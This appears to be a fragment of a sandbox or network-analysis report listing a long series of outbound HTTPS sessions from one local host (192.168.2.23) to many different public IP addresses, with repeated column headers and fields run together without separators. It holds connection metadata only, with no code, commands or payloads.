                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26551192.168.2.2342786171.74.66.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26552192.168.2.2360900187.16.70.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26553192.168.2.233751813.160.214.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26554192.168.2.2349980112.80.168.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26555192.168.2.2352216212.92.136.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26556192.168.2.234903818.69.211.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26557192.168.2.2344140207.207.92.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26558192.168.2.234834651.60.209.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26559192.168.2.2358314190.4.186.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26560192.168.2.2333254131.132.106.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26561192.168.2.235063412.127.160.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26562192.168.2.235425650.121.204.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26563192.168.2.235383436.221.81.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26564192.168.2.2341222131.186.151.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26565192.168.2.2358910163.142.166.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26566192.168.2.234714471.143.70.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26567192.168.2.2352420209.197.173.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26568192.168.2.234102213.143.196.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26569192.168.2.234995678.58.72.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26570192.168.2.23453024.198.52.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26571192.168.2.234900242.26.136.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26572192.168.2.234192060.48.241.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26573192.168.2.2358692169.236.90.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26574192.168.2.234663860.148.164.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26575192.168.2.235975845.25.8.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26576192.168.2.2356606133.207.159.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26577192.168.2.235553689.93.35.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26578192.168.2.2350580165.177.192.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26579192.168.2.235985063.42.247.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26580192.168.2.2339442206.238.215.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26581192.168.2.2345098149.21.236.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26582192.168.2.234847669.139.207.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26583192.168.2.2333336105.37.248.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26584192.168.2.236019859.34.226.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26585192.168.2.23447842.27.188.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26586192.168.2.235444424.205.179.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26587192.168.2.2334354204.39.73.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26588192.168.2.234733684.28.113.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26589192.168.2.234684014.235.243.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26590192.168.2.234864845.169.88.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26591192.168.2.2350358143.249.100.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26592192.168.2.235316437.239.207.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26593192.168.2.2340114210.180.60.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26594192.168.2.2355274186.102.166.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26595192.168.2.2334946100.18.115.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26596192.168.2.2357010107.139.56.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26597192.168.2.2333126200.218.145.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26598192.168.2.2338946211.206.34.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26599192.168.2.2342030186.15.182.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26600192.168.2.233697863.78.91.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26601192.168.2.23459285.203.188.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26602192.168.2.2343900141.144.91.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26603192.168.2.2359062209.138.115.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26604192.168.2.2349386194.27.67.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26605192.168.2.2342904222.5.115.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26606192.168.2.2360580172.244.208.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26607192.168.2.2338896170.169.109.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26608192.168.2.2341338186.77.173.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26609192.168.2.2357544175.221.160.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26610192.168.2.233655470.151.212.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26611192.168.2.235218418.128.172.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26612192.168.2.2348692175.73.206.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26613192.168.2.2349402119.50.115.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26614192.168.2.2352126116.87.57.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26615192.168.2.234564243.142.150.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26616192.168.2.234856490.55.115.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26617192.168.2.234465817.196.71.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26618192.168.2.2344362110.9.48.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26619192.168.2.2352408148.71.179.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26620192.168.2.2333532132.31.181.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26621192.168.2.2345246163.93.253.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26622192.168.2.23349189.237.118.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26623192.168.2.2334968192.130.29.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26624192.168.2.2347166163.211.92.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26625192.168.2.234424818.66.249.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26626192.168.2.233794867.103.112.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26627192.168.2.2349302148.247.163.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26628192.168.2.234393889.227.0.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26629192.168.2.2349276176.49.157.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26630192.168.2.2333406191.65.135.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26631192.168.2.2347576138.153.255.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26632192.168.2.235252227.146.110.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26633192.168.2.2339792194.194.10.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26634192.168.2.234948497.179.85.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26635192.168.2.2334628217.64.210.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26636192.168.2.236025040.108.124.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26637192.168.2.235240423.184.53.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26638192.168.2.23530905.101.98.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26639192.168.2.2353770184.76.20.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26640192.168.2.2337562152.99.202.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26641192.168.2.2334064213.37.13.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26642192.168.2.236076878.48.128.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26643192.168.2.233814481.209.110.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26644192.168.2.2342296180.180.154.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26645192.168.2.233370263.255.131.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26646192.168.2.234909024.163.252.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26647192.168.2.2339330142.179.232.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26648192.168.2.235194223.168.215.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26649192.168.2.23417121.132.118.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26650192.168.2.233795824.144.99.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26651192.168.2.2356542151.177.154.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26652192.168.2.234543671.158.32.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26653192.168.2.235060680.126.40.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26654192.168.2.234965089.206.173.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26655192.168.2.234094096.242.43.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26656192.168.2.235174891.115.66.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26657192.168.2.235663652.238.18.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26658192.168.2.2352862118.104.208.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26659192.168.2.23342441.41.243.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26660192.168.2.2349672119.21.78.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26661192.168.2.2357578110.148.152.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26662192.168.2.2344262166.100.107.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26663192.168.2.2341538222.60.49.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26664192.168.2.2349408185.240.65.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26665192.168.2.234577413.16.154.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26666192.168.2.233931053.106.93.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26667192.168.2.2343318142.241.136.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26668192.168.2.2336832174.188.255.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26669192.168.2.2358676128.78.41.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26670192.168.2.234945465.236.40.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26671192.168.2.235388887.236.225.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26672192.168.2.233746263.62.65.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26673192.168.2.2348970103.212.237.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26674192.168.2.2339908109.57.152.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26675192.168.2.234068462.0.152.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26676192.168.2.2343000153.247.9.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26677192.168.2.2338238104.206.207.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26678192.168.2.235168670.210.176.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26679192.168.2.2349022193.148.54.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26680192.168.2.234975045.104.192.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26681192.168.2.2357016102.160.191.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26682192.168.2.23607221.70.134.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26683192.168.2.2355744128.213.9.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26684192.168.2.233805844.242.101.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26685192.168.2.2346516180.168.146.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26686192.168.2.2354162182.171.102.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26687192.168.2.2346924124.175.195.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26688192.168.2.2334470222.124.139.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26689192.168.2.2346656159.143.153.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26690192.168.2.235393295.44.148.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26691192.168.2.2357124116.212.175.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26692192.168.2.2352264145.33.87.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26693192.168.2.2348950145.7.138.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26694192.168.2.2359518181.210.255.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26695192.168.2.23534205.87.145.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26696192.168.2.235059840.155.227.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26697192.168.2.234424094.55.182.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26698192.168.2.2348530163.60.224.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26699192.168.2.233682065.118.110.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26700192.168.2.234614627.152.244.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26701192.168.2.233587284.193.82.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26702192.168.2.235933240.242.160.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26703192.168.2.2343742150.5.37.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26704192.168.2.2356146181.199.26.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26705192.168.2.2333238144.255.201.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26706192.168.2.2357120179.30.149.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26707192.168.2.2359368111.168.229.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26708192.168.2.2344756104.19.31.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26709192.168.2.234355460.168.36.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26710192.168.2.234737645.236.76.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26711192.168.2.2353146152.198.130.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26712192.168.2.233624624.30.37.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26713192.168.2.233713262.14.248.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26714192.168.2.23521282.90.194.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26715192.168.2.234477420.186.98.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26716192.168.2.235807075.251.72.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26717192.168.2.233619695.72.71.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26718192.168.2.2335804222.219.35.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26719192.168.2.2345786104.233.211.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26720192.168.2.2347864184.206.168.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26721192.168.2.2333776184.114.213.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26722192.168.2.233700019.244.184.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26723192.168.2.2353168222.234.212.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26724192.168.2.235346635.171.87.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26725192.168.2.235002866.221.84.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26726192.168.2.2338908112.207.29.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26727192.168.2.2334054192.36.153.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26728192.168.2.2338246223.202.224.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26729192.168.2.2336622183.23.232.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26730192.168.2.2358886156.28.82.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26731192.168.2.2358468112.12.225.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26732192.168.2.2351410113.107.42.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26733192.168.2.234448414.61.31.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26734192.168.2.233647639.143.251.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26735192.168.2.2332950193.74.81.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26736192.168.2.2360228145.244.126.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26737192.168.2.235984623.237.83.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26738192.168.2.233323862.6.187.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26739192.168.2.2342714121.47.9.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26740192.168.2.2351922222.61.249.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26741192.168.2.2354186182.37.83.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26742192.168.2.2337158179.144.117.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26743192.168.2.2336542154.26.188.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26744192.168.2.234507853.133.170.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26745192.168.2.234631499.150.85.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26746192.168.2.236066697.51.71.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26747192.168.2.2347390142.4.218.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26748192.168.2.234096424.255.186.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26749192.168.2.2338304204.28.137.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26750192.168.2.2359028104.211.229.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26751192.168.2.234978087.66.213.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26752192.168.2.2353132172.183.118.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26753192.168.2.2359750154.99.187.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26754192.168.2.234255448.247.173.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26755192.168.2.2342284222.165.235.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26756192.168.2.234556039.1.83.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26757192.168.2.233419890.146.163.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26758192.168.2.234366290.136.209.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26759192.168.2.235696271.32.244.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26760192.168.2.2344896203.191.193.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26761192.168.2.233359499.138.120.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26762192.168.2.235033825.157.88.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26763192.168.2.233587291.206.32.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26764192.168.2.2340252171.164.18.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26765192.168.2.2346008140.115.5.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26766192.168.2.2347534202.49.169.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26767192.168.2.2351112211.19.231.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26768192.168.2.2355362196.42.242.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26769192.168.2.2340426189.113.198.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26770192.168.2.2360462175.200.160.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26771192.168.2.233646660.41.63.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26772192.168.2.2339826153.3.39.160443
